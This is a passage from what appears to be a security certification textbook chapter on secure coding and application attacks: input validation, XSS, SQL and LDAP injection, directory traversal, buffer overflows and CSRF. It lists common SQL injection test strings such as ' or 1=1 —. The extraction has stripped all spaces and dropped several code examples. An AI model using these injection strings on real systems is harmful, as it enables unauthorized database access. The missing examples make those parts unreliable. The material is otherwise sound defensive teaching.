systematicapplicationofaseriesofmalformedinputstotesthowtheprogramresponds.Fuzzinghasbeenusedbyhackersforyearstofindpotentiallyexploitablebufferoverflows,withoutanyspecificknowledgeofthecoding.Atestercanuseafuzzingframeworktoautomatenumerousinputsequences.Inexaminingwhetherafunctioncanfallpreytoabufferoverflow,numerousinputscanberun,testinglengthsandultimatepayload-deliveryoptions.Ifaparticularinputstringresultsinacrashthatcanbeexploited,thisinputwouldthenbeexaminedindetail.Fuzzingisnewtothedevelopmentscenebutisrapidlymaturingandwillsoonbeonnearlyequalfootingwithotherautomatedcode-checkingtools.
SecureCodingConceptsApplicationsecuritybeginswithcodethatissecureandfreeof
vulnerabilities.Unfortunately,allcodehasweaknessesandvulnerabilities,soinstantiatingthecodeinamannerthathaseffectivedefensespreventingtheexploitationofvulnerabilitiescanmaintainadesiredlevelofsecurity.Properhandlingofconfigurations,errorsandexceptions,andinputscanassistinthecreationofasecureapplication.Testingoftheapplicationthroughoutthesystemlifecyclecanbeusedtodeterminetheactualsecurityriskprofileofasystem.Therearenumerousindividualelementsinthesecuredevelopment
lifecycle(SDL)thatcanassistateamindevelopingsecurecode.CorrectSDLprocesses,suchasinputvalidation,propererrorandexceptionhandling,andcross-sitescriptingandcross-siterequestforgerymitigations,canimprovethesecurityofcode.Processelementssuchassecuritytesting,fuzzing,andpatchmanagementalsohelptoensureapplicationsmeetadesiredriskprofile.
ErrorandExceptionHandlingEveryapplicationwillencountererrorsandexceptions,andtheseneedtobehandledinasecuremanner.Oneattackmethodologyincludesforcingerrorstomoveanapplicationfromnormaloperationtoexceptionhandling.Duringanexception,itiscommonpracticetorecord/reportthecondition,includingsupportinginformationsuchasthedatathatresultedintheerror.Thisinformationcanbeinvaluableindiagnosingthecauseoftheerrorcondition.Thechallengeisinwherethisinformationiscaptured.Thebestmethodistocaptureitinalogfile,whereitcanbesecuredbyanACL.Theworstcaseiswhenitisechoedtotheuser.Echoingerrorconditiondetailstouserscanprovidevaluableinformationtoattackerswhentheycauseerrorsonpurpose.
ExamTip:Allerrors/exceptionsshouldbetrappedandhandledinthegeneratingroutine.
Improperexceptionhandlingcanleadtoawiderangeofdisclosures.ErrorsassociatedwithSQLstatementscandisclosedatastructuresanddataelements.Remoteprocedurecall(RPC)errorscangiveupsensitiveinformationsuchasfilenames,paths,andservernames.Programmaticerrorscangiveuplinenumbersthatanexceptionoccurredon,themethodthatwasinvoked,andinformationsuchasstackelements.
InputandOutputValidationWiththemovetoweb-basedapplications,theerrorshaveshiftedfrombufferoverflowstoinput-handlingissues.Usershavetheabilitytomanipulateinput,soitisuptothedevelopertohandletheinputappropriatelytopreventmaliciousentriesfromhavinganeffect.Bufferoverflowscouldbeconsideredaclassofimproperinput,butnewerattacksincludecanonicalizationattacksandarithmeticattacks.Probablythemostimportantdefensivemechanismthatcanbeemployedisinputvalidation.Consideringallinputstobehostileuntilproperlyvalidatedcanmitigatemanyattacksbasedoncommonvulnerabilities.Thisisachallenge,asthevalidationeffortsneedtooccurafterallparsershavecompletedmanipulatinginputstreams,acommonfunctioninweb-basedapplicationsusingUnicodeandotherinternationalcharactersets.Inputvalidationisespeciallywellsuitedforthefollowing
vulnerabilities:bufferoverflow,relianceonuntrustedinputsinasecuritydecision,cross-sitescripting,cross-siterequestforgery,pathtraversal,andincorrectcalculationofbuffersize.Inputvalidationmayseemsuitableforvariousinjectionattacks,butgiventhecomplexityoftheinputandtheramificationsfromlegalbutimproperinputstreams,thismethodfallsshortformostinjectionattacks.Whatcanworkisaformofrecognitionandwhitelistingapproach,wheretheinputisvalidatedandthenparsedintoastandardstructurethatisthenexecuted.Thisrestrictstheattacksurfacetonotonlylegalinputsbutalsoexpectedinputs.
ExamTip:Considerallinputtobehostile.Inputvalidationisoneofthemostimportantsecurecodingtechniquesemployed,mitigatingawidearrayofpotentialvulnerabilities.
Intoday’scomputingenvironment,awiderangeofcharactersetsisused.Unicodeallowsmultilanguagesupport.Charactercodesetsallowmultilanguagecapability.Variousencodingschemes,suchashexencoding,aresupportedtoallowdiverseinputs.Thenetresultofalltheseinputmethodsisthattherearenumerouswaystocreatethesameinputtoaprogram.Canonicalizationistheprocessbywhichapplicationprogramsmanipulatestringstoabaseform,creatingafoundationalrepresentationoftheinput.Canonicalizationerrorsarisefromthefactthatinputstoawebapplicationmaybeprocessedbymultipleapplications,suchasthewebserver,applicationserver,anddatabaseserver,eachwithitsownparserstoresolveappropriatecanonicalizationissues.Wherethisisanissuerelatestotheformoftheinputstringatthetimeoferrorchecking.Iftheerror-checkingroutineoccurspriortoresolutiontocanonicalform,thenissuesmaybemissed.Thestringrepresenting/../,usedindirectorytraversalattacks,canbeobscuredbyencodingandhencemissedbyacharacterstringmatchbeforeanapplicationparsermanipulatesittocanonicalform.Thefirstlineofdefenseistowritesolidcode.Regardlessofthe
languageused,orthesourceofoutsideinput,prudentprogrammingpracticeistotreatallinputfromoutsideafunctionashostile.Validateallinputsasiftheywerehostileandanattempttoforceabufferoverflow.Acceptthenotionthatalthoughduringdevelopmenteveryonemaybeonthesameteam,beconscientious,andbecompliantwithdesignrules,futuremaintainersmaynotbeasrobust.Asecond,andequallyimportant,lineofdefenseisproperstring
handling.Stringhandlingisacommoneventinprograms,andstring-handlingfunctionsarethesourceofalargenumberofknownbuffer-overflowvulnerabilities.Usingstrncpy()inplaceofstrcpy()isapossiblemethodofimprovingsecuritybecausestrncpy()requiresaninputlength
forthenumberofcharacterstobecopied.Thissimplefunctioncallreplacementcanultimatelyfail,however,becauseUnicodeandotherencodingmethodscanmakecharactercountsmeaningless.Toresolvethisissuerequiresnewlibrarycalls,andmuchcloserattentiontohowinputstrings,andsubsequentlyoutputstrings,canbeabused.Properuseoffunctionstoachieveprogramobjectivesisessentialtopreventunintendedeffectssuchasbufferoverflows.Useofthegets()functioncanprobablyneverbetotallysafesinceitreadsfromthestdinstreamuntilalinefeedorcarriagereturn.Inmostcases,thereisnowaytopredeterminewhethertheinputisgoingtooverflowthebuffer.AbettersolutionistouseaC++streamobjectorthefgets()function.Thefunctionfgets()requiresaninputbufferlength,andhenceavoidstheoverflow.Simplyreplace
TechTip
ARoseIsaRoseIsar%6fseCanonicalformreferstosimplestform,and,duetothemanyencodingschemesinuse,canbeacomplexissue.CharacterscanbeencodedinASCII,Unicode,hex,UTF-8,orevencombinationsofthese.So,iftheattackerdesirestoobfuscatehisresponse,thenseveralthingscanhappen.ByURLencodingURLstrings,itmaybepossibletocircumventfiltersecuritysystemsand
IDS:
canbecome
Doubleencodingcancomplicatethematterevenfurther.Round1decoding
becomes
Round2decoding
becomes
Thebottomlineissimple:Knowthatencodingcanbeused,andplanforitwhendesigninginputverificationmechanisms.Expectencodedtransmissionstobeusedtoattempttobypasssecuritymechanisms.
Outputvalidationisjustasimportantinmanycasesasinputvalidation.Ifqueryingadatabaseforausernameandpasswordmatch,theexpected
formsoftheoutputofthematchfunctionshouldbeeitheronematchornone.Ifusingrecordcounttoindicatethelevelofmatch,whichisacommonpractice,thenavalueotherthan0or1wouldbeanerror.Defensivecodingusingoutputvalidationwouldnotactonvalues>1,astheseareclearlyanerrorandshouldbetreatedasafailure.
FuzzingOneofthemostpowerfultoolsthatcanbeusedintestingisfuzzing(a.k.a.fuzztesting),whichisthesystematicapplicationofaseriesofmalformedinputstotesthowtheprogramresponds.Fuzzinghasbeenusedbyhackersforyearstofindpotentiallyexploitablebufferoverflows,withoutanyspecificknowledgeofthecoding.Fuzztestingworksperfectlyfineregardlessofthetypeoftesting,whiteboxorblackbox.Fuzzingservesasabestpracticeforfindingunexpectedinputvalidationerrors.Atestercanuseafuzzingframeworktoautomatenumerousinput
sequences.Inexaminingwhetherafunctioncanfallpreytoabufferoverflow,atestercanrunnumerousinputs,testinglengthsandultimatepayload-deliveryoptions.Ifaparticularinputstringresultsinacrashthatcanbeexploited,thetesterwouldthenexaminethisinputindetail.Fuzzingisstillrelativelynewtothedevelopmentscenebutisrapidlymaturingandwillsoonbeonnearlyequalfootingwithotherautomatedcode-checkingtools.
BugTrackingBugtrackingisafoundationalelementinsecuredevelopment.Allbugsareenumerated,classified,andtracked.Iftheclassificationofabugexceedsasetlevel,thenitmustberesolvedbeforethecodeadvancestothenextlevelofdevelopment.Bugsareclassifiedbasedontheriskthevulnerabilityexposes.Microsoftusesfourlevels:
CriticalAsecurityvulnerabilityhavingthehighestpotentialfor
damage
ImportantAsecurityvulnerabilityhavingsignificantpotentialfordamage,butlessthanCritical
ModerateAsecurityvulnerabilityhavingmoderatepotentialfordamage,butlessthanImportant
LowAsecurityvulnerabilityhavinglowpotentialfordamage
ExamplesofCriticalvulnerabilitiesincludethosethatwithoutwarningtotheusercanresultinremoteexploitinvolvingelevationofprivilege.Criticalisreallyreservedforthemostimportantrisks.AsanexampleofthedistinctionbetweenCriticalandImportant,avulnerabilitythatwouldleadtoamachinefailurerequiringreinstallationofsoftwarewouldonlyscoreImportant.Thekeydifferenceisthattheuserwouldknowofthispenetrationandrisk,whereasforaCriticalvulnerability,theusermayneverknowthatitoccurred.Thetrackingoferrorsservesseveralpurposes.First,froma
managementperspective,whatismeasuredismanaged,bothbymanagementandbythoseinvolved.Overtime,fewererrorswilloccuriftheworkforceknowstheyarebeingtracked,takenseriously,andrepresentanissuewiththeproduct.Second,sincenotallerrorsareimmediatelycorrectable,thisenablesfuturecorrectionwhenamoduleisrewritten.Zerodefectsincodeislikezerodefectsinquality:notanachievableobjective.Butthisdoesnotmeanthatconstantimprovementoftheprocesscannotdramaticallyreducetheerrorrates.EvidencefromfirmsinvolvedinSAFECodesupportthis,astheyarereapingthebenefitsoflowererrorratesandreduceddevelopmentcostsfromlowerlevelsofcorrectivework.
ApplicationAttacksAttacksagainstasystemcanoccuratthenetworklevel,attheoperatingsystemlevel,attheapplicationlevel,orattheuserlevel(socialengineering).Earlyattackpatternswereagainstthenetwork,butmostof
today’sattacksareaimedattheapplications,primarilybecausethatiswheretheobjectiveofmostattacksresides—intheinfamouswordsofbankrobberWillieSutton,“becausethat’swherethemoneyis.”Infact,manyoftoday’sattacksonsystemsusecombinationsofvulnerabilitiesinnetworks,operatingsystems,andapplications,allmeanstoanendtoobtainthedesiredobjectiveofanattack,whichisusuallysomeformofdata.Application-levelattackstakeadvantageofseveralfactsassociatedwith
computerapplications.First,mostapplicationsarelargeprogramswrittenbygroupsofprogrammers,andbytheirnaturehaveerrorsindesignandcodingthatcreatevulnerabilities.Foralistoftypicalvulnerabilities,seetheCommonVulnerabilitiesandExposures(CVE)listmaintainedbyMITRE(http://cve.mitre.org).Second,evenwhenvulnerabilitiesarediscoveredandpatchedbysoftwarevendors,endusersareslowtoapplypatches,asevidencedbytheSQLSlammerincidentinJanuary2003.Thevulnerabilityexploitedwasabufferoverflow,andthevendorsuppliedapatchsixmonthspriortotheoutbreak,yetthewormstillspreadquicklyduetothemultitudeofunpatchedsystems.
Cross-SiteScriptingCross-sitescripting(XSS)isoneofthemostcommonwebattackmethodologies.
Cross-sitescriptingisabbreviatedXSStodistinguishitfromCascadingStyleSheets(CSS).
Across-sitescriptingattackisacodeinjectionattackinwhichanattackersendscodeinresponsetoaninputrequest.Thiscodeisthenrenderedbythewebserver,resultingintheexecutionofthecodebythewebserver.Cross-sitescriptingattackstakeadvantageofafewcommonelementsinweb-basedsystems.Firstisthecommonfailuretoperform
completeinputvalidation.XSSsendsscriptinresponsetoaninputrequest,evenwhenscriptisnottheexpectedorauthorizedinputtype.Secondisthenatureofweb-basedsystemstodynamicallyself-createoutput.Web-basedsystemsarefrequentlycollectionsofimages,text,scripts,andmore,whicharepresentedbyawebservertoabrowserthatinterpretsandrenders.XSSattackscanexploitthedynamicallyself-createdoutputbyexecutingascriptintheclientbrowserthatreceivesthealteredoutput.Thecauseofthevulnerabilityisweakuserinputvalidation.Ifinputis
notvalidatedproperly,anattackercanincludeascriptintheirinputandhaveitrenderedaspartofthewebprocess.ThereareseveraldifferenttypesofXSSattacks,whicharedistinguishedbytheeffectofthescript:
NonpersistentXSSattackTheinjectedscriptisnotpersistedorstored,butratherisimmediatelyexecutedandpassedbackviathewebserver.
PersistentXSSattackThescriptispermanentlystoredonthewebserverorsomeback-endstorage.Thisallowsthescripttobeusedagainstotherswhologintothesystem.
DOM-basedXSSattackThescriptisexecutedinthebrowserviatheDocumentObjectModel(DOM)processasopposedtothewebserver.
Cross-sitescriptingattackscanresultinawiderangeofconsequences,andinsomecases,thelistcanbeanythingthatacleverscriptercandevise.Commonusesthathavebeenseeninthewildincludethefollowing:
Theftofauthenticationinformationfromawebapplication
Sessionhijacking
Deployinghostilecontent
Changingusersettings,includingfutureusers
Impersonatingauser
Phishingorstealingsensitiveinformation
ControlstodefendagainstXSSattacksincludetheuseofanti-XSSlibrariestostripscriptsfromtheinputsequences.VariousotherwaystomitigateXSSattacksincludelimitingtypesofuploadsandscreeningthesizeofuploads,whitelistinginputs,andsoon,butattemptingtoremovescriptsfrominputscanbeatrickytask.Well-designedanti-XSSinputlibraryfunctionshaveproventobethebestdefense.Cross-sitescriptingvulnerabilitiesareeasilytestedforandshouldbeapartofthetestplanforeveryapplication.Testingavarietyofencodedandunencodedinputsforscriptingvulnerabilityisanessentialtestelement.
InjectionsUseofinputtoafunctionwithoutvalidationhasalreadybeenshowntoberiskybehavior.Anotherissuewithunvalidatedinputisthecaseofcodeinjection.Ratherthantheinputbeingappropriateforthefunction,thiscodeinjectionchangesthefunctioninanunintendedway.ASQLinjectionattackisaformofcodeinjectionaimedatanyStructuredQueryLanguage(SQL)–baseddatabase,regardlessofvendor.Theprimarymethodofdefenseagainstthistypeofvulnerabilityis
similartothatforbufferoverflows:validateallinputs.Butratherthanvalidatingtowardjustlength,youneedtovalidateinputsforcontent.Imagineawebpagethatasksforuserinput,andthenusesthatinputinthebuildingofasubsequentpage.NowimaginethattheuserputsthetextforaJavaScriptfunctioninthemiddleoftheirinputsequence,alongwithacalltothescript.Now,thegeneratedwebpagehasanaddedJavaScriptfunctionthatiscalledwhendisplayed.PassingtheuserinputthroughanHTMLencodefunctionbeforeusecanpreventsuchattacks.Again,goodprogrammingpracticegoesalongwaytowardpreventing
thesetypesofvulnerabilities.Thisplacestheburdennotjustontheprogrammers,butalsoontheprocessoftrainingprogrammers,thesoftwareengineeringprocessthatreviewscode,andthetestingprocessto
catchprogrammingerrors.Thisismuchmorethanasingle-personresponsibility;everyoneinvolvedinthesoftwaredevelopmentprocessneedstobeawareofthetypesandcausesoftheseerrors,andsafeguardsneedtobeinplacetopreventtheirpropagation.
TechTip
TestingforSQLInjectionVulnerabilityTherearetwomainstepsassociatedwithtestingforSQLinjectionvulnerability.Firstoneneedstoconfirmthatthesystemisatallvulnerable.ThiscanbedoneusingvariousinputstotestwhetheraninputvariablecanbeusedtomanipulatetheSQLcommand.Thefollowingarecommontestvectorsused:
′or1=1—″or1=1—
or1=1—′or′a′=′a
″or″a″=″a′)or(′a′=′a
NotethattheuseofsingleordoublequotesisSQLimplementationdependent,astherearesyntacticdifferencesbetweenthemajordatabaseengines.Thesecondstepistousetheerrormessageinformationtoattempttoperformanactual
exploitagainstthedatabase.
SQLInjectionASQLinjectionattackisaformofcodeinjectionaimedatanyStructuredQueryLanguage(SQL)–baseddatabase,regardlessofvendor.Anexampleofthistypeofattackiswherethefunctiontakestheuser-providedinputsforusernameandpasswordandsubstitutesthemintoawhereclauseofaSQLstatementwiththeexpresspurposeofchangingthewhereclauseintoonethatgivesafalseanswertothequery.AssumethedesiredSQLstatementis
ThevaluesJDoeandnewpassareprovidedfromtheuserandaresimplyinsertedintothestringsequence.Thoughseeminglysafefunctionally,thiscanbeeasilycorruptedbyusingthesequence
sincethischangesthewhereclausetoonethatreturnsallrecords:
Theadditionoftheorclause,withanalwaystruestatementandthebeginningofacommentlinetoblockthetrailingsinglequote,alterstheSQLstatementtooneinwhichthewhereclauseisrenderedinoperable.
LDAPInjectionLDAP-basedsystemsarealsosubjecttoinjectionattacks.WhenanapplicationconstructsanLDAPrequestbasedonuserinput,afailuretovalidatetheinputcanleadtobadLDAPrequests.JustastheSQLinjectioncanbeusedtoexecutearbitrarycommandsinadatabase,theLDAPinjectioncandothesameinadirectorysystem.Somethingassimpleasawildcardcharacter(*)inasearchboxcanreturnresultsthatwouldnormallybebeyondthescopeofaquery.ProperinputvalidationisimportantbeforepassingtherequesttoanLDAPengine.
XMLInjectionXMLcanbetamperedwithviainjectionaswell.XMLinjectionscanbeusedtomanipulateanXML-basedsystem.AsXMLisnearlyubiquitousinthewebapplicationworld,thisformofattackhasawiderangeoftargets.
DefenseAgainstInjectionAttacksTheprimarymethodofdefenseagainstinjectionattacksissimilartothatforbufferoverflows:validateallinputs.Butratherthanvalidatingtowardjustlength,youneedtovalidateinputsforcontent.Imagineawebpagethatasksforuserinput,andthenusesthatinputinthebuildingofasubsequentpage.AlsoimaginethattheuserputsthetextforaJavaScriptfunctioninthemiddleoftheirinputsequence,alongwithacalltothescript.Now,thegeneratedwebpagehasanaddedJavaScriptfunctionthatiscalledwhendisplayed.PassingtheuserinputthroughanHtmlEncodefunctionbeforeusecanpreventsuchattacks.
ExamTip:Fortheexam,youshouldunderstandinjection-typeattacksandhowtheymanipulatethesystemstheyareinjecting,SQL,LDAP,andXML.
DirectoryTraversal/CommandInjectionAdirectorytraversalattackiswhenanattackerusesspecialinputstocircumventthedirectorytreestructureofthefilesystem.Addingencodedsymbolsfor“../..”inanunvalidatedinputboxcanresultintheparserresolvingtheencodingtothetraversalcode,bypassingmanydetectionelements,andpassingtheinputtothefilesystemandresultingintheprogramexecutingcommandsinadifferentlocationthandesigned.Whencombinedwithacommandinjection,theinputcanresultinexecutionofcodeinanunauthorizedmanner.Classifiedasinputvalidationerrors,thesecanbedifficulttodetectwithoutdoingcodewalkthroughsandspecificallylookingforthem.ThisillustratestheusefulnessoftheTop25MostDangerousSoftwareErrorschecklistduringcodereviews,asitwouldalertdeveloperstothisissueduringdevelopment.Directorytraversalscanbemaskedbyusingencodingofinputstreams.
Ifthesecuritycheckisdonebeforethestringisdecodedbythesystemparser,thenrecognitionoftheattackformmaybeimpaired.Thereare
manywaystorepresentaparticularinputform,thesimplestofwhichisthecanonicalform(introducedearlierinthe“ARoseIsaRoseIsar%6fse”TechTip).ParsersareusedtorenderthecanonicalformfortheOS,buttheseembeddedparsersmayactafterinputvalidation,makingitmoredifficulttodetectcertainattacksfromjustmatchingastring.
BufferOverflowIfthere’soneitemthatcouldbelabeledasthe“MostWanted”incodingsecurity,itwouldbethebufferoverflow.TheCERT/CCatCarnegieMellonUniversityestimatesthatnearlyhalfofallexploitsofcomputerprogramsstemhistoricallyfromsomeformofbufferoverflow.Findingavaccinetobufferoverflowswouldstampouthalfofthesesecurity-relatedincidents,bytype,andprobably90percentbyvolume.TheMorrisfingerwormin1988wasanexploitofanoverflow,asweremorerecentbig-nameeventssuchasCodeRedandSlammer.Thegenericclassificationofbufferoverflowsincludesmanyvariants,suchasstaticbufferoverruns,indexingerrors,formatstringbugs,UnicodeandANSIbuffersizemismatches,andheapoverruns.Theconceptbehindthesevulnerabilitiesisrelativelysimple.Theinput
bufferthatisusedtoholdprograminputisoverwrittenwithdatathatislargerthanthebuffercanhold.Therootcauseofthisvulnerabilityisamixtureoftwothings:poorprogrammingpracticeandprogramminglanguageweaknesses.Forexample,whatwouldhappenifaprogramthatasksfora7-to10-characterphonenumberinsteadreceivesastringof150characters?Manyprogramswillprovidesomeerrorcheckingtoensurethatthiswillnotcauseaproblem.Someprograms,however,cannothandlethiserror,andtheextracharacterscontinuetofillmemory,overwritingotherportionsoftheprogram.Thiscanresultinanumberofproblems,includingcausingtheprogramtoabortorthesystemtocrash.Undercertaincircumstances,theprogramcanexecuteacommandsuppliedbytheattacker.Bufferoverflowstypicallyinheritthelevelofprivilegeenjoyedbytheprogrambeingexploited.Thisiswhyprogramsthatuse
root-levelaccessaresodangerouswhenexploitedwithabufferoverflow,asthecodethatwillexecutedoessoatroot-levelaccess.ProgramminglanguagessuchasCweredesignedforspaceand
performanceconstraints.ManyfunctionsinC,likegets(),areunsafeinthattheywillpermitunsafeoperations,suchasunboundedstringmanipulationintofixedbufferlocations.TheClanguagealsopermitsdirectmemoryaccessviapointers,afunctionalitythatprovidesalotofprogrammingpowerbutcarrieswithittheburdenofpropersafeguardsbeingprovidedbytheprogrammer.
ExamTip:Bufferoverflowscanoccurinanycode,andcodethatrunswithprivilegehasanevengreaterriskprofile.In2014,abufferoverflowintheOpenSSLlibrary,calledHeartbleed,lefthundredsofthousandsofsystemsvulnerableandexposedcriticaldatafortenstohundredsofmillionusersworldwide.
Bufferoverflowsareinputvalidationattacks,designedtotakeadvantageofinputroutinesthatdonotvalidatethelengthofinputs.Surprisinglysimpletoresolve,allthatisrequiredisthevalidationofallinputlengthspriortowritingtomemory.Thiscanbedoneinavarietyofmanners,includingtheuseofsafelibraryfunctionsforinputs.Thisisoneofthevulnerabilitiesthathasbeenshowntobesolvable,andinfacttheprevalenceisdecliningsubstantiallyamongmajorsecurity-conscioussoftwarefirms.
IntegerOverflowAnintegeroverflowisaprogrammingerrorconditionthatoccurswhenaprogramattemptstostoreanumericvalue,aninteger,inavariablethatistoosmalltoholdit.Theresultsvarybylanguageandnumerictype.Insomecases,thevaluesaturatesthevariable,assumingthemaximumvalueforthedefinedtypeandnomore.Inothercases,especiallywithsigned
integers,itcanrolloverintoanegativevalue,asthemostsignificantbitisusuallyreservedforthesignofthenumber.Thiscancreatesignificantlogicerrorsinaprogram.Integeroverflowsareeasilytestedfor,andstaticcodeanalyzerscan
pointoutwheretheyarelikelytooccur.Giventhis,therearenotanygoodexcusesforhavingtheseerrorsendupinproductioncode.
Cross-SiteRequestForgeryCross-siterequestforgery(XSRF)attacksutilizeunintendedbehaviorsthatareproperindefinedusebutareperformedundercircumstancesoutsidetheauthorizeduse.Thisisanexampleofa“confuseddeputy”problem,aclassofproblemswhereoneentitymistakenlyperformsanactiononbehalfofanother.AnXSRFattackreliesuponseveralconditionstobeeffective.Itisperformedagainstsitesthathaveanauthenticateduserandexploitsthesite’strustinapreviousauthenticationevent.Then,bytrickingauser’sbrowsertosendanHTTPrequesttothetargetsite,thetrustisexploited.Assumeyourbankallowsyoutologinandperformfinancialtransactions,butdoesnotvalidatetheauthenticationforeachsubsequenttransaction.Ifauserisloggedinandhasnotclosedtheirbrowser,thenanactioninanotherbrowsertabcouldsendahiddenrequesttothebank,resultinginatransactionthatappearstobeauthorizedbutinfactwasnotdonebytheuser.Therearemanydifferentmitigationtechniquesthatcanbeemployed,
fromlimitingauthenticationtimes,tocookieexpiration,tomanagingsomespecificelementsofawebpagelikeheaderchecking.ThestrongestmethodistheuseofrandomXSRFtokensinformsubmissions.Subsequentrequestscannotwork,asthetokenwasnotsetinadvance.TestingforXSRFtakesabitmoreplanningthanforotherinjection-typeattacks,butthis,too,canbeaccomplishedaspartofthedesignprocess.
Zero-Day
Zero-dayisatermusedtodefinevulnerabilitiesthatarenewlydiscoveredandnotyetaddressedbyapatch.Mostvulnerabilitiesexistinanunknownstateuntildiscoveredbyaresearcherorthedeveloper.Ifaresearcherordeveloperdiscoversavulnerabilitybutdoesnotsharetheinformation,thenthisvulnerabilitycanbeexploitedwithoutavendor’sabilitytofixit,becauseforallpracticalknowledgetheissueisunknown,excepttothepersonwhofoundit.Fromthetimeofdiscoveryuntilafixorpatchismadeavailable,thevulnerabilitygoesbythenamezero-day,indicatingthatithasnotbeenaddressedyet.Themostfrighteningthingaboutzero-daysistheunknownfactor—theircapabilityandeffectonriskareunknown.
AttachmentsAttachmentscanalsobeusedasanattackvector.Ifauserinputsagraphicsfile(forinstance,aJPEGfile),andthatfileisalteredtocontainexecutablecodesuchasJava,thenwhentheimageisrendered,thecodeisexecuted.Thiscanenableawiderangeofattacks.
LocallySharedObjectsLocallysharedobjects(LSOs)arepiecesofdatathatarestoredonauser’smachinetosaveinformationfromanapplication,suchasagame.FrequentlythesearecookiesusedbyAdobeFlash,calledFlashCookies,andcanstoreinformationsuchasuserpreferences.Asthesecanbemanipulatedoutsideoftheapplication,theycanrepresentasecurityorprivacythreat.
Client-SideAttacksThewebbrowserhasbecomethemajorapplicationforuserstoengageresourcesacrosstheWeb.Web-basedattacksarecoveredindetailinChapter17.
ExamTip:Awidevarietyofattackvectorscanbeusedagainstaclientmachine,includingcachepoisoning,cross-sitescripting,cross-userdefacement,pagehijacking,cookiemanipulation,andopenredirect.Allattacksshouldbeknownfortheexam.
Arbitrary/RemoteCodeExecutionOneoftherisksinvolvedintakinguserinputandusingittocreateacommandtobeexecutedonasystemisarbitraryorremotecodeexecution.Thisattackinvolvesanattackerpreparinganinputstatementthatchangestheformorfunctionofapreparedstatement.Aformofcommandinjection,thisattackcanallowausertoinsertarbitrarycodeandthenremotelyexecuteitonasystem.Thisisaformofinputvalidationfailure,asusersshouldnothavetheabilitytochangethewayaprograminteractswiththehostOSoutsideofasetofdefinedandapprovedmethods.
OpenVulnerabilityandAssessmentLanguageTheMITRECorporationhasdoneextensiveresearchintosoftwarevulnerabilities.Toenablecollaborationbetweenthemanydifferentpartiesinvolvedinsoftwaredevelopmentandmaintenance,MITREhasdevelopedataxonomyofvulnerabilities,theCommonVulnerabilitiesandExposures(CVE).ThisisjustoneofthemanyrelatedenumerationsthatMITREhasdeveloped,inanefforttomakemachine-readabledataexchangestofacilitatesystemmanagementacrosslargeenterprises.TheCVEledtoeffortssuchasthedevelopmentoftheOpenVulnerabilityandAssessmentLanguage(OVAL).OVALcomprisestwomainelements:anXML-basedmachine-readablelanguagefordescribingvulnerabilities,andarepository;seehttp://oval.mitre.org.
CVEprovidessecuritypersonnelwithacommonlanguagetousewhendiscussingvulnerabilities.IfoneisdiscussingaspecificvulnerabilityintheFlashobjectthatallowsanarbitraryexecutionofcode,thenusingthenomenclatureCVE-2005-2628recordsthespecificsofthevulnerabilityandensureseveryoneisdiscussingthesameproblem.
InadditiontotheCVEandOVALefforts,MITREhasdevelopedawiderangeofenumerationsandstandardsdesignedtoeasetheautomationofsecuritymanagementatthelowestlevelsacrossanenterprise.Additionaleffortsincludethefollowing:
CommonAttackPatternEnumerationandClassification(CAPEC)
ExtensibleConfigurationChecklistDescriptionFormat(XCCDF)
SecurityContentAutomationProtocol(SCAP)
CommonConfigurationEnumeration(CCE)
CommonPlatformEnumeration(CPE)
CommonWeaknessEnumeration(CWE)
CommonEventExpression(CEE)
CommonResultFormat(CRF)
TheCommonWeaknessEnumeration(CWE)isimportantforsecuredevelopmentinthatitenumeratescommonpatternsofdevelopmentthatleadtoweaknessandpotentialvulnerabilities.AdditionalinformationcanbeobtainedfromtheMITREMakingSecurityMeasurablewebsite,http://measurablesecurity.mitre.org.
ApplicationHardeningApplicationhardeningworksinthesamefashionassystemhardening
(discussedinChapter14).Thefirststepistheremovalofunnecessarycomponentsoroptions.Thesecondstepistheproperconfigurationofthesystemasitisimplemented.Everyupdateorpatchcanleadtochangestotheseconditions,andtheyshouldbeconfirmedaftereveryupdate.Theprimarytoolsusedtoensureahardenedsystemareasecure
applicationconfigurationbaselineandapatchmanagementprocess.Whenproperlyemployed,thesetoolscanleadtothemostsecuresystem.
ApplicationConfigurationBaselineAbaselineisthesetofpropersettingsforacomputersystem.Anapplicationconfigurationbaselineoutlinesthepropersettingsandconfigurationsforanapplicationorsetofapplications.Thesesettingsincludemanyelements,fromapplicationsettingstosecuritysettings.Protectionofthesettingsiscrucial,andthemostcommonmechanismsusedtoprotectthemincludeaccesscontrollistsandprotecteddirectories.Thedocumentationofthedesiredsettingsisanimportantsecuritydocument,assistingadministratorsinensuringthatproperconfigurationsaremaintainedacrossupdates.
ApplicationPatchManagementApplicationpatchmanagementisafundamentalcomponentofapplicationandsystemhardening.Theobjectiveistoberunningthemostsecureversionofanapplication,and,withveryfewexceptions,thatwouldbethemostcurrentversionofsoftware,includingpatches.Mostupdatesandpatchesincludefixingsecurityissuesandclosingvulnerabilities.Currentpatchingisarequirementofmanycomplianceschemesaswell.Patchingdoesnotalwaysgoasplanned,andsomepatchesmayresultin
problemsinproductionsystems.Aformalsystemofpatchmanagementisneededtotestandimplementpatchesinachange-controlledmanner.
ExamTip:Patchmanagementmightbereferredtoasupdatemanagement,configurationmanagement,orchangemanagement.Althoughthesetermsarenotstrictlysynonyms,theymightbeusedinterchangeablyontheexam.
NoSQLDatabasesvs.SQLDatabasesCurrentprogrammingtrendsincludetopicssuchaswhethertouseSQLdatabasesorNoSQLdatabases.SQLdatabasesarethosethatuseStructuredQueryLanguagetomanipulateitemsthatarereferencedinarelationalmannerintheformoftables.NoSQLreferstodatastoresthatemployneitherSQLnorrelationaltablestructures.Eachsystemhasitsstrengthsandweaknesses,andbothcanbeusedforawiderangeofdatastorageneeds.SQLdatabasesarebyfarthemostcommon,withimplementationsby
IBM,Microsoft,andOraclebeingthemajorplayers.NoSQLdatabasestendtobecustom-builtusinglow-levellanguagesandlackmanyofthestandardsofexistingdatabases.ThishasnotstoppedthegrowthofNoSQLdatabasesinlarge-scale,well-resourcedenvironments.Theimportantfactorinaccessingdatainasecurefashionisinthe
correctemploymentofprogrammingstructuresandframeworkstoabstracttheaccessprocess.MethodssuchasinlineSQLgenerationcoupledwithinputvalidationerrorsisarecipefordisasterintheformofSQLinjectionattacks.
Server-Sidevs.Client-SideValidationInamodernclient/serverenvironment,datacanbecheckedforcompliancewithinput/outputrequirementseitherontheserverorontheclient.Thereareadvantagestoverifyingdataelementsonaclientbeforesendingtotheserver—namely,efficiency.Doingchecksontheclientsavesaround-trip,anditsdelays,beforeausercanbealertedtoa
problem.Thiscanimproveusabilityofsoftwareinterfaces.Theclientisnotasuitableplacetoperformanycriticalvaluechecksor
